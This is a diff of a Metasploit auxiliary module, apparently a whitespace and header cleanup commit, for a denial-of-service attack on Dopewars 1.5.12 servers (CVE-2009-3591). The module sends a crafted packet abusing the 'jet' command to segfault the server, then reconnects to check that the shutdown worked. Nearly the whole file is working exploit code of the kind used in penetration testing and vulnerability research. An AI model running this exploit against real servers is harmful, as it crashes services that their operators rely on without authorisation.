|
1 | | -# Dopewars DOS attack |
2 | | -# |
3 | | -# The jet command in Dopewars <= 1.5.12 is vulnerable to a segmentaion |
4 | | -# fault due to a lack of input validation. |
5 | | -# |
| 1 | +## |
| 2 | +# This file is part of the Metasploit Framework and may be subject to |
| 3 | +# redistribution and commercial restrictions. Please see the Metasploit |
| 4 | +# web site for more information on licensing and terms of use. |
| 5 | +# http://metasploit.com/ |
| 6 | +## |
6 | 7 |
|
7 | 8 | require 'msf/core' |
8 | 9 |
|
9 | 10 | class Metasploit4 < Msf::Auxiliary |
10 | 11 |
|
11 | 12 | include Msf::Exploit::Remote::Tcp |
12 | 13 | include Msf::Auxiliary::Dos |
13 | | - |
| 14 | + |
14 | 15 | def initialize(info = {}) |
15 | | - super(update_info(info, |
16 | | - 'Name' => 'Dopewars Denial of Service', |
17 | | - 'Description' => %q{ |
18 | | - The jet command in Dopewars 1.5.12 is vulnerable to a segmentaion fault due to a lack of input validation. |
| 16 | + super(update_info(info, |
| 17 | + 'Name' => 'Dopewars Denial of Service', |
| 18 | + 'Description' => %q{ |
| 19 | + The jet command in Dopewars 1.5.12 is vulnerable to a segmentaion fault due to a lack of input validation. |
19 | 20 | }, |
20 | | - 'Author' => [ 'Doug Prostko <dougtko[at]gmail.com>' ], |
21 | | - 'License' => MSF_LICENSE, |
22 | | - 'Version' => '0.0.2', |
23 | | - 'References' => |
| 21 | + 'Author' => [ 'Doug Prostko <dougtko[at]gmail.com>' ], |
| 22 | + 'License' => MSF_LICENSE, |
| 23 | + 'Version' => '0.0.2', |
| 24 | + 'References' => |
24 | 25 | [ |
25 | 26 | [ 'BID', '36606' ], |
26 | | - [ 'CVE', 'CVE-2009-3591' ], |
| 27 | + [ 'CVE', '2009-3591' ], |
27 | 28 | ])) |
28 | | - |
| 29 | + |
29 | 30 | register_options([Opt::RPORT(7902),], self.class) |
30 | 31 | end |
31 | 32 |
|
32 | 33 | def run |
33 | | - # The jet command is vulnerable. |
34 | | - # Program received signal SIGSEGV, Segmentation fault. |
35 | | - # [Switching to Thread 0xb74916c0 (LWP 30638)] |
36 | | - # 0x08062f6e in HandleServerMessage (buf=0x8098828 "", Play=0x809a000) at |
37 | | - # serverside.c:525 |
38 | | - # 525 dopelog(4, LF_SERVER, "%s jets to %s", |
39 | | - # |
40 | | - connect |
| 34 | + # The jet command is vulnerable. |
| 35 | + # Program received signal SIGSEGV, Segmentation fault. |
| 36 | + # [Switching to Thread 0xb74916c0 (LWP 30638)] |
| 37 | + # 0x08062f6e in HandleServerMessage (buf=0x8098828 "", Play=0x809a000) at |
| 38 | + # serverside.c:525 |
| 39 | + # 525 dopelog(4, LF_SERVER, "%s jets to %s", |
| 40 | + # |
| 41 | + connect |
41 | 42 | pkt = "foo^^Ar1111111\n^^Acfoo\n^AV65536\n" |
42 | 43 | print_status("Sending dos packet...") |
43 | 44 | sock.put(pkt) |
44 | 45 | disconnect |
45 | 46 |
|
46 | | - print_status("Checking for success...") |
47 | | - sleep 2 |
48 | | - begin |
49 | | - connect |
50 | | - rescue ::Interrupt |
51 | | - raise $! |
52 | | - rescue ::Rex::ConnectionRefused |
53 | | - print_good("Dopewars server succesfully shut down!") |
54 | | - else |
55 | | - print_error("DOS attack unsuccessful") |
56 | | - ensure |
57 | | - disconnect |
58 | | - end |
| 47 | + print_status("Checking for success...") |
| 48 | + sleep 2 |
| 49 | + begin |
| 50 | + connect |
| 51 | + rescue ::Interrupt |
| 52 | + raise $! |
| 53 | + rescue ::Rex::ConnectionRefused |
| 54 | + print_good("Dopewars server succesfully shut down!") |
| 55 | + else |
| 56 | + print_error("DOS attack unsuccessful") |
| 57 | + ensure |
| 58 | + disconnect |
| 59 | + end |
59 | 60 | end |
60 | 61 | end |
0 commit comments